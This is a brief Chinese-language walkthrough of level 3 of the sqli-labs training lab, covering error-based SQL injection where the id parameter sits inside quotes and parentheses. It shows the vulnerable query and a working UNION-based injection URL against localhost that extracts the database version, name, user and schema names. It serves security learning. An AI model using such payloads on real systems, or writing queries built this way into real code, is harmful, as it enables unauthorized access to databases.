less 3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)
1、针对‘、“做简单的变形,代码如下:
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
具体页面显示如下:
针对提示错误,可以看出针对查询参数添加()做变形。这种等同于我们开始的单引号报错,闭合方式一样使用括号闭合,然后将后面的单引号注释掉。
http://127.0.0.1/sqli/Less-3/?id=-1') union select 1,concat_ws(char(32,58,32),version(),database(),user()),schema_name from information_schema.schemata limit 5,1 --+